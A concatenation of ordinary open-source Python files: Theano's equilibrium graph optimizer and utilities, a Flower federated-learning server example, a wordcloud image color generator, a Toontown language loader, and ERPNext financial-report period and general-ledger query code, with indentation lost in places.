ignore_newtrees=True,
failure_callback=failure_callback)
self.local_optimizers = []
self.global_optimizers = []
for opt in optimizers:
if isinstance(opt, LocalOptimizer):
self.local_optimizers.append(opt)
else:
self.global_optimizers.append(opt)
self.max_depth = max_depth
self.max_use_ratio = max_use_ratio
assert self.max_use_ratio is not None, (
'max_use_ratio has to be a number')
def add_requirements(self, fgraph):
super(EquilibriumOptimizer, self).add_requirements(fgraph)
fgraph.attach_feature(ChangeTracker())
for opt in self.local_optimizers:
opt.add_requirements(fgraph)
for opt in self.global_optimizers:
opt.add_requirements(fgraph)
def apply(self, fgraph, start_from=None):
if start_from is None:
start_from = fgraph.outputs
changed = True
max_use_abort = False
opt_name = None
process_count = {}
max_nb_nodes = 0
loop_timing = []
global_opt_timing = []
time_lopts = {}
io_toposort_timing = []
nb_nodes = []
for lopt in self.local_optimizers:
process_count.setdefault(lopt, 0)
time_lopts.setdefault(lopt, 0)
while changed and not max_use_abort:
t0 = time.time()
changed = False
#apply global optimizer
fgraph.change_tracker.reset()
for gopt in self.global_optimizers:
gopt.apply(fgraph)
if fgraph.change_tracker.changed:
changed = True
global_opt_timing.append(float(time.time() - t0))
#apply local optimizer
for node in start_from:
assert node in fgraph.outputs
topo_t0 = time.time()
q = deque(graph.io_toposort(fgraph.inputs, start_from))
io_toposort_timing.append(time.time() - topo_t0)
nb_nodes.append(len(q))
max_nb_nodes = max(max_nb_nodes, len(q))
max_use = max_nb_nodes * self.max_use_ratio
def importer(node):
if node is not current_node:
q.append(node)
def pruner(node):
if node is not current_node:
try:
q.remove(node)
except ValueError:
pass
u = self.attach_updater(fgraph, importer, pruner)
try:
while q:
node = q.pop()
current_node = node
for lopt in self.local_optimizers:
t_lopt = time.time()
lopt_change = self.process_node(fgraph, node, lopt)
time_lopts[lopt] += time.time() - t_lopt
if lopt_change:
process_count[lopt] += 1
changed = True
if process_count[lopt] > max_use:
max_use_abort = True
opt_name = (getattr(lopt, "name", None)
or getattr(lopt, "__name__", ""))
if node not in fgraph.apply_nodes:
# go to next node
break
finally:
self.detach_updater(fgraph, u)
loop_timing.append(float(time.time() - t0))
if max_use_abort:
_logger.error("EquilibriumOptimizer max'ed out by '%s'" % opt_name
+ ". You can safely raise the current threshold of "
+ "%f with the theano flag 'optdb.max_use_ratio'." %
config.optdb.max_use_ratio)
if config.time_eq_optimizer:
print "EquilibriumOptimizer",
print getattr(self, "name", getattr(self, "__name__", ""))
print " time %.3fs for %d passes, %d nodes max" % (
sum(loop_timing), len(loop_timing), max_nb_nodes)
for i in range(len(loop_timing)):
print '%d - %.3fs (%.3fs in global opts) - %d nodes' % (
i, loop_timing[i], global_opt_timing[i], nb_nodes[i])
print
count_opt = []
for opt, count in process_count.iteritems():
if count > 0:
count_opt.append((count, opt))
if count_opt:
print 'times applied - optimizer:'
count_opt.sort()
for (count, opt) in count_opt[::-1]:
print ' %d - %s' % (count, opt)
print
return (self, loop_timing, process_count, max_nb_nodes,
global_opt_timing, nb_nodes, time_lopts, io_toposort_timing)
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
name = getattr(self, 'name', None)
print >> stream, "%s%s %s id=%i" % (
(' ' * level), self.__class__.__name__, name, id(self))
if depth != 0:
for lopt in self.local_optimizers:
lopt.print_summary(stream, level=(level + 2),
depth=(depth - 1))
@staticmethod
def print_profile(stream, prof, level=0):
(opt, loop_timing, process_count, max_nb_nodes,
global_opt_timing, nb_nodes, time_lopts, io_toposort_timing) = prof
blanc = (' ' * level)
print >> stream, blanc, "EquilibriumOptimizer",
print >> stream, blanc, getattr(opt, "name",
getattr(opt, "__name__", ""))
print >> stream, blanc, " time %.3fs for %d passes, %d nodes max" % (
sum(loop_timing), len(loop_timing), max_nb_nodes)
print >> stream, blanc, " time io_toposort %.3fs" % sum(
io_toposort_timing)
for i in range(len(loop_timing)):
print >> stream, blanc, ('%d - %.3fs (%.3fs in global opts, '
'%.3fs io_toposort) - %d nodes' % (
i, loop_timing[i],
global_opt_timing[i],
io_toposort_timing[i], nb_nodes[i]))
count_opt = []
for opt, count in process_count.iteritems():
if count > 0:
count_opt.append((time_lopts[opt], count, opt))
if count_opt:
print >> stream, blanc, 'times applied - optimizer (only those applied):'
count_opt.sort()
for (t, count, opt) in count_opt[::-1]:
print >> stream, blanc, ' %.3fs - %d - %s' % (
t, count, opt)
print >> stream
@staticmethod
def merge_profile(prof1, prof2):
#(opt, loop_timing, process_count, max_nb_nodes,
# global_opt_timing, nb_nodes, time_lopts, io_toposort_timing) = prof1
local_optimizers = set(prof1[0].local_optimizers).union(
prof2[0].local_optimizers)
global_optimizers = set(prof1[0].global_optimizers).union(
prof2[0].global_optimizers)
new_opt = EquilibriumOptimizer(
local_optimizers.union(global_optimizers),
max_use_ratio=1)
def merge_list(l1, l2):
l = copy.copy(l1)
for idx, nb in enumerate(l2):
if idx < len(l):
l[idx] += nb
else:
l.append(nb)
return l
loop_timing = merge_list(prof1[1], prof2[1])
process_count = prof1[2].copy()
for process, count in prof2[2].iteritems():
if process in process_count:
process_count[process] += count
else:
process_count[process] = count
max_nb_nodes = max(prof1[3], prof2[3])
global_opt_timing = merge_list(prof1[4], prof2[4])
nb_nodes = merge_list(prof1[5], prof2[5])
time_lopts = prof1[6].copy()
for opt, t in prof2[6].iteritems():
if opt in time_lopts:
time_lopts[opt] += t
else:
time_lopts[opt] = t
io_toposort_timing = merge_list(prof1[7], prof2[7])
assert (len(loop_timing) == len(global_opt_timing) ==
len(io_toposort_timing) == len(nb_nodes))
assert len(loop_timing) == max(len(prof1[1]), len(prof2[1]))
return (new_opt,
loop_timing,
process_count,
max_nb_nodes,
global_opt_timing,
nb_nodes,
time_lopts,
io_toposort_timing)
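# Construction sketch (the optimizer names and `fgraph` are placeholders):
# local and global optimizations can be mixed in a single list, and
# `max_use_ratio` must be given.
#
#     eq = EquilibriumOptimizer([local_opt_a, local_opt_b, global_opt_c],
#                               max_use_ratio=10,
#                               failure_callback=NavigatorOptimizer.warn_inplace)
#     eq.optimize(fgraph)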
#################
### Utilities ###
#################
def _check_chain(r, chain):
"""WRITEME"""
chain = list(reversed(chain))
while chain:
elem = chain.pop()
if elem is None:
if not r.owner is None:
return False
elif r.owner is None:
return False
elif isinstance(elem, op.Op):
if not r.owner.op == elem:
return False
else:
try:
if (issubclass(elem, op.Op)
and not isinstance(r.owner.op, elem)):
return False
except TypeError:
return False
if chain:
r = r.owner.inputs[chain.pop()]
#print 'check_chain', _check_chain.n_calls
#_check_chain.n_calls += 1
# The return value will be used as a Boolean, but some Variables cannot
# be used as Booleans (the results of comparisons, for instance)
return (r is not None)
#_check_chain.n_calls = 0
def check_chain(r, *chain):
"""WRITEME"""
if isinstance(r, graph.Apply):
r = r.outputs[0]
return _check_chain(r, reduce(list.__iadd__, ([x, 0] for x in chain)))
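# Worked example of what the chain check means (hypothetical Op instances
# `dot` and `transpose`): check_chain(r, dot, transpose) is True when `r` was
# produced by `dot` and the first input of that apply node was itself produced
# by `transpose`, i.e. it checks r.owner.op == dot and
# r.owner.inputs[0].owner.op == transpose.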
def pre_greedy_local_optimizer(list_optimizations, out):
    '''
    This function traverses the part of the computation graph in the ancestors
    of ``out`` that is not yet attached to a fgraph, and applies each of the
    local_optimizations to the traversed graph.
    Its main use is to apply constant folding locally when generating
    the graph of the indices of a subtensor.
    We should not apply optimizations to nodes that are already in an fgraph,
    so nodes that have an ``fgraph`` attribute are skipped.
    :note: This does not run to equilibrium. If the list contains an
    optimization such as local_upcast_elemwise_constant_inputs, which
    adds additional nodes to the inputs of a node, it may be necessary
    to call this function multiple times.
    '''
def local_recursive_function(list_opt, out, optimized_vars, depth):
if not getattr(out, 'owner', None):
return [out], optimized_vars
node = out.owner
if hasattr(node, 'fgraph'):
return node.outputs, optimized_vars
for idx, inp in enumerate(node.inputs):
if inp in optimized_vars:
nw_in = optimized_vars[inp]
else:
if inp.owner:
outs, optimized_vars = local_recursive_function(
list_opt,
inp,
optimized_vars,
depth + 1)
for k, v in zip(inp.owner.outputs, outs):
optimized_vars[k] = v
nw_in = outs[inp.owner.outputs.index(inp)]
else:
nw_in = inp
optimized_vars[inp] = inp
node.inputs[idx] = nw_in
results = node.outputs
for opt in list_opt:
ret = opt.transform(node)
if ret is not False and ret is not None:
assert len(ret) == len(node.outputs)
for k, v in zip(node.outputs, ret):
optimized_vars[k] = v
results = ret
if ret[0].owner:
node = out.owner
else:
break
return results, optimized_vars
final_outs, optimized_nodes = local_recursive_function(
list_optimizations, out, {}, 0)
return final_outs[0]
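# Usage sketch (`local_constant_folding_opt` and `index_expr` are placeholders
# for a constant-folding LocalOptimizer and an index expression that is not yet
# attached to a FunctionGraph, e.g. one built while constructing a Subtensor):
#
#     idx = pre_greedy_local_optimizer([local_constant_folding_opt], index_expr)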
############
### Misc ###
############
class InplaceOptimizer(Optimizer):
def __init__(self, inplace):
self.inplace = inplace
def apply(self, fgraph):
self.inplace(fgraph)
def add_requirements(self, fgraph):
fgraph.attach_feature(dh.DestroyHandler())
class PureThenInplaceOptimizer(Optimizer):
def __init__(self, pure, inplace):
self.pure = pure
self.inplace = inplace
def apply(self, fgraph):
self.pure(fgraph)
fgraph.attach_feature(dh.DestroyHandler())
self.inplace(fgraph)
|
py | 7dfce5b96d6fe4864ebb617d7467c6360afee308 | # Copyright 2020 Adap GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Minimal example on how to start a simple Flower server."""
import argparse
from typing import Callable, Dict, Optional, Tuple
import numpy as np
import flwr as fl
from . import DEFAULT_SERVER_ADDRESS, fashion_mnist
def main() -> None:
"""Start server and train five rounds."""
parser = argparse.ArgumentParser(description="Flower")
parser.add_argument(
"--server_address",
type=str,
default=DEFAULT_SERVER_ADDRESS,
help=f"gRPC server address (default: {DEFAULT_SERVER_ADDRESS})",
)
parser.add_argument(
"--rounds",
type=int,
default=1,
help="Number of rounds of federated learning (default: 1)",
)
parser.add_argument(
"--sample_fraction",
type=float,
default=0.1,
help="Fraction of available clients used for fit/evaluate (default: 0.1)",
)
parser.add_argument(
"--min_sample_size",
type=int,
default=1,
help="Minimum number of clients used for fit/evaluate (default: 1)",
)
parser.add_argument(
"--min_num_clients",
type=int,
default=1,
help="Minimum number of available clients required for sampling (default: 1)",
)
parser.add_argument(
"--log_host", type=str, help="Logserver address (no default)",
)
args = parser.parse_args()
# Configure logger
fl.common.logger.configure("server", host=args.log_host)
# Load evaluation data
_, xy_test = fashion_mnist.load_data(partition=0, num_partitions=1)
# Create client_manager, strategy, and server
client_manager = fl.server.SimpleClientManager()
strategy = fl.server.strategy.DefaultStrategy(
fraction_fit=args.sample_fraction,
min_fit_clients=args.min_sample_size,
min_available_clients=args.min_num_clients,
eval_fn=get_eval_fn(xy_test=xy_test),
on_fit_config_fn=fit_config,
)
server = fl.server.Server(client_manager=client_manager, strategy=strategy)
# Run server
fl.server.start_server(
args.server_address, server, config={"num_rounds": args.rounds},
)
def fit_config(rnd: int) -> Dict[str, str]:
"""Return a configuration with static batch size and (local) epochs."""
config = {
"epoch_global": str(rnd),
"epochs": str(1),
"batch_size": str(64),
}
return config
def get_eval_fn(
xy_test: Tuple[np.ndarray, np.ndarray]
) -> Callable[[fl.common.Weights], Optional[Tuple[float, float]]]:
"""Return an evaluation function for centralized evaluation."""
def evaluate(weights: fl.common.Weights) -> Optional[Tuple[float, float]]:
"""Use the entire Fashion-MNIST test set for evaluation."""
model = fashion_mnist.load_model()
model.set_weights(weights)
loss, acc = model.evaluate(xy_test[0], xy_test[1], batch_size=len(xy_test))
return float(loss), float(acc)
return evaluate
if __name__ == "__main__":
main()
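# Example invocation (the module path is an assumption -- adjust it to wherever
# this package lives in your tree; with these flags two clients must connect
# before training starts):
#
#     python -m flwr_example.tf_fashion_mnist.server \
#         --rounds 3 --sample_fraction 1.0 --min_sample_size 2 --min_num_clients 2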
|
py | 7dfce6a0659bfc789be0b2157056eda6d5d18344 | import numpy as np
from PIL import ImageFont
class ImageColorGenerator(object):
"""Color generator based on a color image.
Generates colors based on an RGB image. A word will be colored using
the mean color of the enclosing rectangle in the color image.
After construction, the object acts as a callable that can be passed as
color_func to the word cloud constructor or to the recolor method.
Parameters
----------
image : nd-array, shape (height, width, 3)
Image to use to generate word colors. Alpha channels are ignored.
        This should be the same size as the canvas for the wordcloud.
"""
# returns the average color of the image in that region
def __init__(self, image):
if image.ndim not in [2, 3]:
raise ValueError("ImageColorGenerator needs an image with ndim 2 or"
" 3, got %d" % image.ndim)
if image.ndim == 3 and image.shape[2] not in [3, 4]:
raise ValueError("A color image needs to have 3 or 4 channels, got %d"
% image.shape[2])
self.image = image
def __call__(self, word, font_size, font_path, position, orientation, **kwargs):
"""Generate a color for a given word using a fixed image."""
# get the font to get the box size
font = ImageFont.truetype(font_path, font_size)
transposed_font = ImageFont.TransposedFont(font,
orientation=orientation)
# get size of resulting text
box_size = transposed_font.getsize(word)
x = position[0]
y = position[1]
# cut out patch under word box
patch = self.image[x:x + box_size[0], y:y + box_size[1]]
if patch.ndim == 3:
# drop alpha channel if any
patch = patch[:, :, :3]
if patch.ndim == 2:
raise NotImplementedError("Gray-scale images TODO")
color = np.mean(patch.reshape(-1, 3), axis=0)
return "rgb(%d, %d, %d)" % tuple(color)
|
py | 7dfce6dd535b4cad6fb0dfae6d8ab7e13fe00ac7 | from panda3d.core import *
from direct.showbase import DConfig
import string
import types
try:
language = DConfig.GetString('language', 'english')
checkLanguage = DConfig.GetBool('check-language', 0)
except:
language = simbase.config.GetString('language', 'english')
checkLanguage = simbase.config.GetBool('check-language', 0)
def getLanguage():
return language
print('TTLocalizer: Running in language: %s' % language)
if language == 'english':
_languageModule = 'toontown.toonbase.TTLocalizer' + language.capitalize()
else:
checkLanguage = 1
_languageModule = 'toontown.toonbase.TTLocalizer_' + language
print('from ' + _languageModule + ' import *')
from toontown.toonbase.TTLocalizerEnglish import *
if checkLanguage:
l = {}
g = {}
englishModule = __import__('toontown.toonbase.TTLocalizerEnglish', g, l)
foreignModule = __import__(_languageModule, g, l)
for key, val in list(englishModule.__dict__.items()):
if key not in foreignModule.__dict__:
print('WARNING: Foreign module: %s missing key: %s' % (_languageModule, key))
locals()[key] = val
elif isinstance(val, dict):
fval = foreignModule.__dict__.get(key)
for dkey, dval in list(val.items()):
if dkey not in fval:
print('WARNING: Foreign module: %s missing key: %s.%s' % (_languageModule, key, dkey))
fval[dkey] = dval
for dkey in list(fval.keys()):
if dkey not in val:
print('WARNING: Foreign module: %s extra key: %s.%s' % (_languageModule, key, dkey))
for key in list(foreignModule.__dict__.keys()):
if key not in englishModule.__dict__:
print('WARNING: Foreign module: %s extra key: %s' % (_languageModule, key))
|
py | 7dfce85629b832ebfa494dbd3688e09d5899c980 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import re
from past.builtins import cmp
import functools
import math
import frappe, erpnext
from erpnext.accounts.report.utils import get_currency, convert_to_presentation_currency
from erpnext.accounts.utils import get_fiscal_year
from frappe import _
from frappe.utils import (flt, getdate, get_first_day, add_months, add_days, formatdate, cstr, cint)
from six import itervalues
from erpnext.accounts.doctype.accounting_dimension.accounting_dimension import get_accounting_dimensions, get_dimension_with_children
def get_period_list(from_fiscal_year, to_fiscal_year, period_start_date, period_end_date, filter_based_on, periodicity, accumulated_values=False,
company=None, reset_period_on_fy_change=True, ignore_fiscal_year=False):
"""Get a list of dict {"from_date": from_date, "to_date": to_date, "key": key, "label": label}
	Periodicity can be (Yearly, Half-Yearly, Quarterly, Monthly)"""
if filter_based_on == 'Fiscal Year':
fiscal_year = get_fiscal_year_data(from_fiscal_year, to_fiscal_year)
validate_fiscal_year(fiscal_year, from_fiscal_year, to_fiscal_year)
year_start_date = getdate(fiscal_year.year_start_date)
year_end_date = getdate(fiscal_year.year_end_date)
else:
validate_dates(period_start_date, period_end_date)
year_start_date = getdate(period_start_date)
year_end_date = getdate(period_end_date)
months_to_add = {
"Yearly": 12,
"Half-Yearly": 6,
"Quarterly": 3,
"Monthly": 1
}[periodicity]
period_list = []
start_date = year_start_date
months = get_months(year_start_date, year_end_date)
for i in range(cint(math.ceil(months / months_to_add))):
period = frappe._dict({
"from_date": start_date
})
to_date = add_months(start_date, months_to_add)
start_date = to_date
# Subtract one day from to_date, as it may be first day in next fiscal year or month
to_date = add_days(to_date, -1)
if to_date <= year_end_date:
# the normal case
period.to_date = to_date
else:
# if a fiscal year ends before a 12 month period
period.to_date = year_end_date
if not ignore_fiscal_year:
period.to_date_fiscal_year = get_fiscal_year(period.to_date, company=company)[0]
period.from_date_fiscal_year_start_date = get_fiscal_year(period.from_date, company=company)[1]
period_list.append(period)
if period.to_date == year_end_date:
break
# common processing
for opts in period_list:
key = opts["to_date"].strftime("%b_%Y").lower()
if periodicity == "Monthly" and not accumulated_values:
label = formatdate(opts["to_date"], "MMM YYYY")
else:
if not accumulated_values:
label = get_label(periodicity, opts["from_date"], opts["to_date"])
else:
if reset_period_on_fy_change:
label = get_label(periodicity, opts.from_date_fiscal_year_start_date, opts["to_date"])
else:
label = get_label(periodicity, period_list[0].from_date, opts["to_date"])
opts.update({
"key": key.replace(" ", "_").replace("-", "_"),
"label": label,
"year_start_date": year_start_date,
"year_end_date": year_end_date
})
return period_list
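# Illustrative call and result shape (actual dates depend on the Fiscal Year
# records configured in the site, so this is only a sketch):
#
#     get_period_list("2021", "2021", None, None, "Fiscal Year", "Quarterly")
#     -> four dicts, one per quarter, each with a key like "jun_2021", a label
#        like "Apr 21-Jun 21", its from_date/to_date, and the
#        year_start_date/year_end_date bounds.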
def get_fiscal_year_data(from_fiscal_year, to_fiscal_year):
fiscal_year = frappe.db.sql("""select min(year_start_date) as year_start_date,
max(year_end_date) as year_end_date from `tabFiscal Year` where
name between %(from_fiscal_year)s and %(to_fiscal_year)s""",
{'from_fiscal_year': from_fiscal_year, 'to_fiscal_year': to_fiscal_year}, as_dict=1)
return fiscal_year[0] if fiscal_year else {}
def validate_fiscal_year(fiscal_year, from_fiscal_year, to_fiscal_year):
if not fiscal_year.get('year_start_date') or not fiscal_year.get('year_end_date'):
frappe.throw(_("Start Year and End Year are mandatory"))
if getdate(fiscal_year.get('year_end_date')) < getdate(fiscal_year.get('year_start_date')):
frappe.throw(_("End Year cannot be before Start Year"))
def validate_dates(from_date, to_date):
if not from_date or not to_date:
frappe.throw("From Date and To Date are mandatory")
if to_date < from_date:
frappe.throw("To Date cannot be less than From Date")
def get_months(start_date, end_date):
diff = (12 * end_date.year + end_date.month) - (12 * start_date.year + start_date.month)
return diff + 1
def get_label(periodicity, from_date, to_date):
if periodicity == "Yearly":
if formatdate(from_date, "YYYY") == formatdate(to_date, "YYYY"):
label = formatdate(from_date, "YYYY")
else:
label = formatdate(from_date, "YYYY") + "-" + formatdate(to_date, "YYYY")
else:
label = formatdate(from_date, "MMM YY") + "-" + formatdate(to_date, "MMM YY")
return label
def get_data(
company, root_type, balance_must_be, period_list, filters=None,
accumulated_values=1, only_current_fiscal_year=True, ignore_closing_entries=False,
	ignore_accumulated_values_for_fy=False, total=True):
accounts = get_accounts(company, root_type)
if not accounts:
return None
accounts, accounts_by_name, parent_children_map = filter_accounts(accounts)
company_currency = get_appropriate_currency(company, filters)
gl_entries_by_account = {}
for root in frappe.db.sql("""select lft, rgt from tabAccount
where root_type=%s and ifnull(parent_account, '') = ''""", root_type, as_dict=1):
set_gl_entries_by_account(
company,
period_list[0]["year_start_date"] if only_current_fiscal_year else None,
period_list[-1]["to_date"],
root.lft, root.rgt, filters,
gl_entries_by_account, ignore_closing_entries=ignore_closing_entries
)
calculate_values(
accounts_by_name, gl_entries_by_account, period_list, accumulated_values, ignore_accumulated_values_for_fy)
accumulate_values_into_parents(accounts, accounts_by_name, period_list)
out = prepare_data(accounts, balance_must_be, period_list, company_currency)
out = filter_out_zero_value_rows(out, parent_children_map)
if out and total:
add_total_row(out, root_type, balance_must_be, period_list, company_currency)
return out
def get_appropriate_currency(company, filters=None):
if filters and filters.get("presentation_currency"):
return filters["presentation_currency"]
else:
return frappe.get_cached_value('Company', company, "default_currency")
def calculate_values(
accounts_by_name, gl_entries_by_account, period_list, accumulated_values, ignore_accumulated_values_for_fy):
for entries in itervalues(gl_entries_by_account):
for entry in entries:
d = accounts_by_name.get(entry.account)
if not d:
frappe.msgprint(
_("Could not retrieve information for {0}.").format(entry.account), title="Error",
raise_exception=1
)
for period in period_list:
# check if posting date is within the period
if entry.posting_date <= period.to_date:
if (accumulated_values or entry.posting_date >= period.from_date) and \
(not ignore_accumulated_values_for_fy or
entry.fiscal_year == period.to_date_fiscal_year):
d[period.key] = d.get(period.key, 0.0) + flt(entry.debit) - flt(entry.credit)
if entry.posting_date < period_list[0].year_start_date:
d["opening_balance"] = d.get("opening_balance", 0.0) + flt(entry.debit) - flt(entry.credit)
def accumulate_values_into_parents(accounts, accounts_by_name, period_list):
"""accumulate children's values in parent accounts"""
for d in reversed(accounts):
if d.parent_account:
for period in period_list:
accounts_by_name[d.parent_account][period.key] = \
accounts_by_name[d.parent_account].get(period.key, 0.0) + d.get(period.key, 0.0)
accounts_by_name[d.parent_account]["opening_balance"] = \
accounts_by_name[d.parent_account].get("opening_balance", 0.0) + d.get("opening_balance", 0.0)
def prepare_data(accounts, balance_must_be, period_list, company_currency):
data = []
year_start_date = period_list[0]["year_start_date"].strftime("%Y-%m-%d")
year_end_date = period_list[-1]["year_end_date"].strftime("%Y-%m-%d")
for d in accounts:
# add to output
has_value = False
total = 0
row = frappe._dict({
"account": _(d.name),
"parent_account": _(d.parent_account) if d.parent_account else '',
"indent": flt(d.indent),
"year_start_date": year_start_date,
"year_end_date": year_end_date,
"currency": company_currency,
"include_in_gross": d.include_in_gross,
"account_type": d.account_type,
"is_group": d.is_group,
"opening_balance": d.get("opening_balance", 0.0) * (1 if balance_must_be=="Debit" else -1),
"account_name": ('%s - %s' %(_(d.account_number), _(d.account_name))
if d.account_number else _(d.account_name))
})
for period in period_list:
if d.get(period.key) and balance_must_be == "Credit":
# change sign based on Debit or Credit, since calculation is done using (debit - credit)
d[period.key] *= -1
row[period.key] = flt(d.get(period.key, 0.0), 3)
if abs(row[period.key]) >= 0.005:
# ignore zero values
has_value = True
total += flt(row[period.key])
row["has_value"] = has_value
row["total"] = total
data.append(row)
return data
def filter_out_zero_value_rows(data, parent_children_map, show_zero_values=False):
data_with_value = []
for d in data:
if show_zero_values or d.get("has_value"):
data_with_value.append(d)
else:
# show group with zero balance, if there are balances against child
children = [child.name for child in parent_children_map.get(d.get("account")) or []]
if children:
for row in data:
if row.get("account") in children and row.get("has_value"):
data_with_value.append(d)
break
return data_with_value
def add_total_row(out, root_type, balance_must_be, period_list, company_currency):
total_row = {
"account_name": _("Total {0} ({1})").format(_(root_type), _(balance_must_be)),
"account": _("Total {0} ({1})").format(_(root_type), _(balance_must_be)),
"currency": company_currency
}
for row in out:
if not row.get("parent_account"):
for period in period_list:
total_row.setdefault(period.key, 0.0)
total_row[period.key] += row.get(period.key, 0.0)
row[period.key] = row.get(period.key, 0.0)
total_row.setdefault("total", 0.0)
total_row["total"] += flt(row["total"])
row["total"] = ""
if "total" in total_row:
out.append(total_row)
# blank row after Total
out.append({})
def get_accounts(company, root_type):
return frappe.db.sql("""
select name, account_number, parent_account, lft, rgt, root_type, report_type, account_name, include_in_gross, account_type, is_group, lft, rgt
from `tabAccount`
where company=%s and root_type=%s order by lft""", (company, root_type), as_dict=True)
def filter_accounts(accounts, depth=20):
parent_children_map = {}
accounts_by_name = {}
for d in accounts:
accounts_by_name[d.name] = d
parent_children_map.setdefault(d.parent_account or None, []).append(d)
filtered_accounts = []
def add_to_list(parent, level):
if level < depth:
children = parent_children_map.get(parent) or []
sort_accounts(children, is_root=True if parent==None else False)
for child in children:
child.indent = level
filtered_accounts.append(child)
add_to_list(child.name, level + 1)
add_to_list(None, 0)
return filtered_accounts, accounts_by_name, parent_children_map
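# Sketch of what filter_accounts returns (the company and root type are
# placeholders): a depth-first flattened list with an `indent` level set on
# every row, plus lookup maps keyed by account name and by parent account.
#
#     flat, by_name, children_of = filter_accounts(get_accounts(company, "Asset"))
#     # flat[0].indent == 0 for a root account, its children carry indent == 1, ...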
def sort_accounts(accounts, is_root=False, key="name"):
"""Sort root types as Asset, Liability, Equity, Income, Expense"""
def compare_accounts(a, b):
if re.split('\W+', a[key])[0].isdigit():
# if chart of accounts is numbered, then sort by number
return cmp(a[key], b[key])
elif is_root:
if a.report_type != b.report_type and a.report_type == "Balance Sheet":
return -1
if a.root_type != b.root_type and a.root_type == "Asset":
return -1
if a.root_type == "Liability" and b.root_type == "Equity":
return -1
if a.root_type == "Income" and b.root_type == "Expense":
return -1
else:
# sort by key (number) or name
return cmp(a[key], b[key])
return 1
accounts.sort(key = functools.cmp_to_key(compare_accounts))
def set_gl_entries_by_account(
company, from_date, to_date, root_lft, root_rgt, filters, gl_entries_by_account, ignore_closing_entries=False):
"""Returns a dict like { "account": [gl entries], ... }"""
additional_conditions = get_additional_conditions(from_date, ignore_closing_entries, filters)
accounts = frappe.db.sql_list("""select name from `tabAccount`
where lft >= %s and rgt <= %s and company = %s""", (root_lft, root_rgt, company))
if accounts:
additional_conditions += " and account in ({})"\
.format(", ".join([frappe.db.escape(d) for d in accounts]))
gl_filters = {
"company": company,
"from_date": from_date,
"to_date": to_date,
"finance_book": cstr(filters.get("finance_book"))
}
if filters.get("include_default_book_entries"):
gl_filters["company_fb"] = frappe.db.get_value("Company",
company, 'default_finance_book')
for key, value in filters.items():
if value:
gl_filters.update({
key: value
})
distributed_cost_center_query = ""
if filters and filters.get('cost_center'):
distributed_cost_center_query = """
UNION ALL
SELECT posting_date,
account,
debit*(DCC_allocation.percentage_allocation/100) as debit,
credit*(DCC_allocation.percentage_allocation/100) as credit,
is_opening,
fiscal_year,
debit_in_account_currency*(DCC_allocation.percentage_allocation/100) as debit_in_account_currency,
credit_in_account_currency*(DCC_allocation.percentage_allocation/100) as credit_in_account_currency,
account_currency
FROM `tabGL Entry`,
(
SELECT parent, sum(percentage_allocation) as percentage_allocation
FROM `tabDistributed Cost Center`
WHERE cost_center IN %(cost_center)s
AND parent NOT IN %(cost_center)s
GROUP BY parent
) as DCC_allocation
WHERE company=%(company)s
{additional_conditions}
AND posting_date <= %(to_date)s
AND is_cancelled = 0
AND cost_center = DCC_allocation.parent
""".format(additional_conditions=additional_conditions.replace("and cost_center in %(cost_center)s ", ''))
gl_entries = frappe.db.sql("""select posting_date, account, debit, credit, is_opening, fiscal_year, debit_in_account_currency, credit_in_account_currency, account_currency from `tabGL Entry`
where company=%(company)s
{additional_conditions}
and posting_date <= %(to_date)s
and is_cancelled = 0
{distributed_cost_center_query}
order by account, posting_date""".format(
additional_conditions=additional_conditions,
distributed_cost_center_query=distributed_cost_center_query), gl_filters, as_dict=True) #nosec
if filters and filters.get('presentation_currency'):
convert_to_presentation_currency(gl_entries, get_currency(filters), filters.get('company'))
for entry in gl_entries:
gl_entries_by_account.setdefault(entry.account, []).append(entry)
return gl_entries_by_account
def get_additional_conditions(from_date, ignore_closing_entries, filters):
additional_conditions = []
accounting_dimensions = get_accounting_dimensions(as_list=False)
if ignore_closing_entries:
additional_conditions.append("ifnull(voucher_type, '')!='Period Closing Voucher'")
if from_date:
additional_conditions.append("posting_date >= %(from_date)s")
if filters:
if filters.get("project"):
if not isinstance(filters.get("project"), list):
filters.project = frappe.parse_json(filters.get("project"))
additional_conditions.append("project in %(project)s")
if filters.get("cost_center"):
filters.cost_center = get_cost_centers_with_children(filters.cost_center)
additional_conditions.append("cost_center in %(cost_center)s")
if filters.get("include_default_book_entries"):
additional_conditions.append("(finance_book in (%(finance_book)s, %(company_fb)s, '') OR finance_book IS NULL)")
else:
additional_conditions.append("(finance_book in (%(finance_book)s, '') OR finance_book IS NULL)")
if accounting_dimensions:
for dimension in accounting_dimensions:
if filters.get(dimension.fieldname):
if frappe.get_cached_value('DocType', dimension.document_type, 'is_tree'):
filters[dimension.fieldname] = get_dimension_with_children(dimension.document_type,
filters.get(dimension.fieldname))
additional_conditions.append("{0} in %({0})s".format(dimension.fieldname))
else:
additional_conditions.append("{0} in (%({0})s)".format(dimension.fieldname))
return " and {}".format(" and ".join(additional_conditions)) if additional_conditions else ""
def get_cost_centers_with_children(cost_centers):
if not isinstance(cost_centers, list):
cost_centers = [d.strip() for d in cost_centers.strip().split(',') if d]
all_cost_centers = []
for d in cost_centers:
if frappe.db.exists("Cost Center", d):
lft, rgt = frappe.db.get_value("Cost Center", d, ["lft", "rgt"])
children = frappe.get_all("Cost Center", filters={"lft": [">=", lft], "rgt": ["<=", rgt]})
all_cost_centers += [c.name for c in children]
else:
frappe.throw(_("Cost Center: {0} does not exist").format(d))
return list(set(all_cost_centers))
def get_columns(periodicity, period_list, accumulated_values=1, company=None):
columns = [{
"fieldname": "account",
"label": _("Account"),
"fieldtype": "Link",
"options": "Account",
"width": 300
}]
if company:
columns.append({
"fieldname": "currency",
"label": _("Currency"),
"fieldtype": "Link",
"options": "Currency",
"hidden": 1
})
for period in period_list:
columns.append({
"fieldname": period.key,
"label": period.label,
"fieldtype": "Currency",
"options": "currency",
"width": 150
})
if periodicity!="Yearly":
if not accumulated_values:
columns.append({
"fieldname": "total",
"label": _("Total"),
"fieldtype": "Currency",
"width": 150
